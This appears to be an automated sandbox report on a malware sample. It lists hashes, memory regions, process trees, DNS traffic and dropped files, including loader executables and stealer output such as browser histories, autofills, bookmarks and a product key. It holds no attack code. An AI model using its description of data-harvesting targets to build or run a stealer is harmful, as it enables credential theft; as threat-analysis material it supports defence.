| SHA256 | b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4 |
| SHA512 | 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937 |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | d1aa9832a89fcef4fe32df07d43736c0 |
| SHA1 | 75b1fd07a8a8935cfa8ab8fa816aebddbeefd1c5 |
| SHA256 | c82c8c416aec3df58bab4ec5b133a7a7ce2a64766c3ba7eab9d33e86be58a4ce |
| SHA512 | bca7f2a3f5d4316cc96d73887ba350cc44fda87eaf609c535cf2eb91cc62bc04003303034bead8f759b531bc3b565d515d731584d64282d273a81c56ec1a9a84 |
memory/3144-1020-0x0000000000BD0000-0x0000000000D62000-memory.dmp
memory/3732-1021-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp
memory/3080-1022-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3144-1023-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3732-1024-0x000001B3F36C0000-0x000001B3F36D0000-memory.dmp
memory/3732-1019-0x000001B3D8E70000-0x000001B3D8FE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | ce008446a6fa668f1482d5dbf86db7a5 |
| SHA1 | e44d92971edbeb71bfd53e38b2d5dd31fe0dc216 |
| SHA256 | b8cf553f561a7594907f7407c23d79b21c175472f56a5bc55a377c6f3c908d4d |
| SHA512 | 980c5a16696eabe5f1c660750be914cd2df4e72111a416ad1d53efd8cb29852b64d5ffdb4e5286543aaa3b76ba599243f768c6338f23af0163dea9107e4cdd6d |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | dd87528a716d48530d8cc7fe6bec3386 |
| SHA1 | 89351d5b60846912f216acb58219397fc1ca9aee |
| SHA256 | eb2b5d61c9a6d7e26f81da14df0c063fb2c71ba294389fce6076a0ae52356244 |
| SHA512 | 9f203bbb162250aab7cd643ac72f430ddd761c063d5a2fd6fd03cdf7707a6e6c287bfeba4b675d4173c92641573313d5f765afefa0c3d159e196542b10d6b861 |
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | 45ea343e335d2d6400ccbc1e3fc85f11 |
| SHA1 | 7f2267d1f27a076e284696c30a4cf4768fd1a52f |
| SHA256 | f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203 |
| SHA512 | c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1 |
memory/3732-1026-0x000001B3F3950000-0x000001B3F39A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt
| MD5 | 412ec159e4b14be1ca93db473e80acc2 |
| SHA1 | 8909b6f7fc8715a749270b6ceb8f05f823f59fd3 |
| SHA256 | eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe |
| SHA512 | a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4 |
C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt
| MD5 | 6be6fdca0cfa94635b8689b2b0bf2bee |
| SHA1 | 379c61029b5443c3d3df7c770423e40618b36d15 |
| SHA256 | 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb |
| SHA512 | 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8 |
memory/3144-1059-0x00000000055A0000-0x00000000055B0000-memory.dmp
memory/3732-1068-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp
memory/3144-1071-0x0000000005E40000-0x0000000005ED2000-memory.dmp
memory/3144-1073-0x0000000005F00000-0x0000000005F08000-memory.dmp
memory/3144-1072-0x0000000005ED0000-0x0000000005EF6000-memory.dmp
memory/3144-1075-0x0000000006E90000-0x0000000006E98000-memory.dmp
memory/3144-1076-0x0000000006EB0000-0x0000000006ECE000-memory.dmp
memory/3144-1074-0x0000000006E80000-0x0000000006E8A000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Process.txt
| MD5 | d162920ec27ea267235b5216d6701181 |
| SHA1 | ef91540d216bead782f55da51239c2682dc7b71d |
| SHA256 | c3f4acbecdd4feb212db3fac658cb531876ae23929b76cb49d35285409a224fd |
| SHA512 | 7e671cbc520856770e202e379979db04665b69c770ee984c36f5f2e5bb7a5c110400f7db99164f50c88762f141a104e769493b8765a9148108f750a0ba1567a4 |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
memory/3144-1260-0x00000000055A0000-0x00000000055B0000-memory.dmp
memory/3144-1263-0x0000000006FE0000-0x000000000705A000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Debug.txt
| MD5 | 894a0706eaf89a7b68175d7da206a8b3 |
| SHA1 | 50cb6c62493034303e4d35aef1e0c45d5dd2e102 |
| SHA256 | ce03ca4421eaf1c1b578af11d74efd3d5d4198860e209ae4929f722cf2601f18 |
| SHA512 | 1a06886bea0f2700b1a6d0d64f3d2cadf8b49ec1300b93dde40d50da2e563f9ec3ea4df446faf6462b95b375dc35a9ac8f71816eb06c96a9b7fea91817667924 |
memory/3144-1335-0x0000000007260000-0x0000000007312000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
memory/3144-1337-0x0000000008630000-0x0000000008984000-memory.dmp
C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\msgid.dat
| MD5 | 0195e3cc8225740a42592efa8bf12f60 |
| SHA1 | d4317e1f9762572ea061de3e2639f74cd2a941be |
| SHA256 | 0aeb189d6afa7545e36f66de5c3bd66f6ee12742d77168605c78588e9eebb1db |
| SHA512 | 8681594da21e812625a02322f0996f140b28f8554ae04cf9eb79723fb2c114e6bf8b4a1c42616254dfd709d3faf15924d344bfec840dd8121e9873d7f6e45173 |
memory/3144-1349-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3144-1350-0x00000000055A0000-0x00000000055B0000-memory.dmp
memory/3144-1351-0x00000000055A0000-0x00000000055B0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2124 wrote to memory of 3208 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2124 wrote to memory of 3208 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2124 wrote to memory of 3208 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.179.17.96.in-addr.arpa | udp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | dbbe3b2e56558f128653635d80156427 |
| SHA1 | 692dcec13ab48af5614982611af2cc048a30035f |
| SHA256 | 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961 |
| SHA512 | e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 4ff06a33c8a7f9b17468a95e88f690c7 |
| SHA1 | 917f7d8e8f6ac2603a2a1b5959f44b86e7b36ebb |
| SHA256 | 615904af68bd931ffad42d2868520dfc1e5e09889bb653c272531d154dc7f6a0 |
| SHA512 | 05aff23b62a15e2efeb9f3a75301204252e766a4a8c8104f9fda086ee47e62f5e5bb7cc9595ba62721ef172250a11be16da67f4bd68a034d75ffb2dfbb061004 |
memory/1520-33-0x0000021DB49A0000-0x0000021DB49B0000-memory.dmp
memory/1520-65-0x0000021DBCE10000-0x0000021DBCE11000-memory.dmp
memory/1520-67-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp
memory/1520-69-0x0000021DBCF50000-0x0000021DBCF51000-memory.dmp
memory/1520-68-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp
memory/1520-49-0x0000021DB4AA0000-0x0000021DB4AB0000-memory.dmp